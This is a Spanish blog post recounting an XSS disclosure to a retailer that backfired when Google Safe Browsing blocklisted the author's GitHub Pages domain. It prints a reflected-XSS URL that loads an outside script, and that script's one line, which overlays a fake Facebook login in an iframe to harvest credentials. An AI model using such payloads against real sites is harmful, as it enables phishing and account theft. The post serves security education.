Cuando una divulgación responsable va al sur

May 10 2022
Arruinando una revelación
Entonces, un poco de información general: encontré una vulnerabilidad XSS reflejada en la barra de búsqueda de un sitio web minorista y decidí revelarla para que puedan arreglarla por diversión y porque soy un buen hacker. ¿Qué es XSS? XSS o cross-site scripting ocurre cuando un atacante puede inyectar y ejecutar código JS malicioso dentro de un sitio web.

Entonces, un poco de información general: encontré una vulnerabilidad XSS reflejada en la barra de búsqueda de un sitio web minorista y decidí revelarla para que puedan arreglarla por diversión y porque soy un buen hacker.

el sitio web en cuestión, ocultando la información del nombre

¿Qué es XSS?

XSS o cross-site scripting ocurre cuando un atacante puede inyectar y ejecutar código JS malicioso dentro de un sitio web.

Cuando agregué un código de explotación simple, obtuve el cuadro de alerta clásico como se muestra a continuación

Ahora llegamos a la revelación

¿Qué hice?

Decidí mostrar el impacto de este error mostrándoselo a las personas a las que se lo estaba revelando y ¿qué mejor manera de hacerlo que desfigurándolo con un clon ficticio de la interfaz de usuario de FB?

Ahora puede preguntar: "¿Por qué hiciste esto?"

XSS es mi vulnerabilidad favorita porque los errores de XSS casi siempre son críticos, pero no lo parecen y, como he trabajado como hacker, los equipos de seguridad me han respondido que no son críticos y que no solucionan los errores. Entonces, para que esos equipos corrigieran los errores, tuve que demostrar el impacto siendo creativo.

Puede significar que use el XSS para desfigurar el sitio o incluso tomar el control de las cuentas de los miembros del equipo de seguridad, ya sea mediante phishing o mediante solicitudes AJAX. Y esto es lo que estaba tratando de mostrar aquí, desfigurando el sitio. Puede leer más sobre XSS en mis artículos sobre XSS y los enlaces de lectura adicionales se encuentran al final del artículo.

Entonces, ¿dónde salió todo mal?

Buenollllll……………….. Usé páginas de Github para alojar el sitio web que usaría para desfigurar el sitio vulnerable y agregué la URL que se muestra a continuación al correo electrónico que enviaría al correo de contacto y al CEO del sitio. .

https://www.vulnerable_website.com/pages/search-results-smart?q=<script%20src='https://jadenfurtado.github.io/fb-ui-clone/eg.js'></script>

eg.js contiene el código:

document.body.innerHTML="<ifrmae src='https://jadenfurtado.github.io/fb-ui-clone' style='width:100%;height:100vh'></ifrmae>";

Inyecta un iframe en el sitio web y engaña a las personas para que proporcionen su nombre de usuario y contraseña, que luego pueden ser capturados por el atacante.

esta página está controlada por el atacante y no por Facebook

El correo electrónico que envié está abajo.

Un pequeño consejo adicional: siempre agregue puntajes CVSS, vectores CVSS, gravedad, POC, capturas de pantalla y Remediación al correo electrónico para ayudar a la persona que lee el correo a comprender el problema. Aquí hay un artículo sobre puntajes CVSS

mi email. En el cuadro rojo está la prueba de concepto

Si has leído todo hasta ahora, ¡puedes ver a dónde va esto!

Envie el correo electronico.

Después de esto, fui a un proyecto paralelo mío también alojado en mis páginas de GitHub para trabajar en él, y esto es lo que vi

:)

Presa del pánico, revisé algunos de los otros sitios que también estaban alojados en mi cuenta de GitHub, ¡y todos estaban bloqueados!

lo que mi amigo vio

Fui a mi cartera, ¡todo está incompleto y eso también está bloqueado! ¡Le pedí a un amigo que revisara mis sitios y él también vio las mismas cosas mientras yo estaba hiperventilando!

¡pánico!

Y fue entonces cuando me di cuenta de que no había considerado algo realmente importante, ¡es decir, la navegación segura de Google!

Verá, cuando puse el enlace de explotación en el correo para el POC, la navegación segura de Google consideró que mi correo electrónico era un correo de phishing y, por lo tanto, incluyó en la lista negra mi dominio de páginas de GitHub, es decir, jadenfurtado.github.io y todos los sitios web alojados en mi GitHub. páginas y marqué mi divulgación como un correo electrónico de phishing.

Curiosamente, antes había investigado como parte de un equipo sobre los vectores de ataque de navegación segura de Google y cometí los mismos errores que se destacaron en el artículo que se publicó sobre los resultados de dicha investigación. ¡Debería saberlo mejor! ‍♂️ El enlace a eso está aquí .

¿Y ahora que?

Bueno, tengo que hacer MUCHAS COSAS.

Primero, vaya a la consola de búsqueda de Google, explique lo que sucedió y pídales que eliminen mi sitio de su lista negra.

Segundo, tengo que tratar de explicarle a la empresa lo que estaba tratando de hacer, es decir, ¡hacer una divulgación responsable y no hackearlos!

Tercero , ponerme en contacto con mis contactos conocidos (¡literalmente, todos los que he conocido en ciberseguridad, alguna vez!) para que puedan aconsejarme sobre lo que debo hacer a continuación y tratar de calmarme.

4º, escribir sobre mi experiencia para que esto no le pase a otros!

5to , ¡estudiar para mis exámenes finales de semestre!

¿Y la vulnerabilidad XSS?

bueno, todavía no han respondido a mi correo electrónico, así que, ¡sí!

¿La moraleja de la historia es?

¡Considera todo lo que puedas en ciberseguridad! ¡Podrías terminar pareciendo bastante tonto si no lo haces!

Y sí, soy un novato, ¡así que enséñame!

Para leer más:

© Copyright 2021 - 2022 | unogogo.com | All Rights Reserved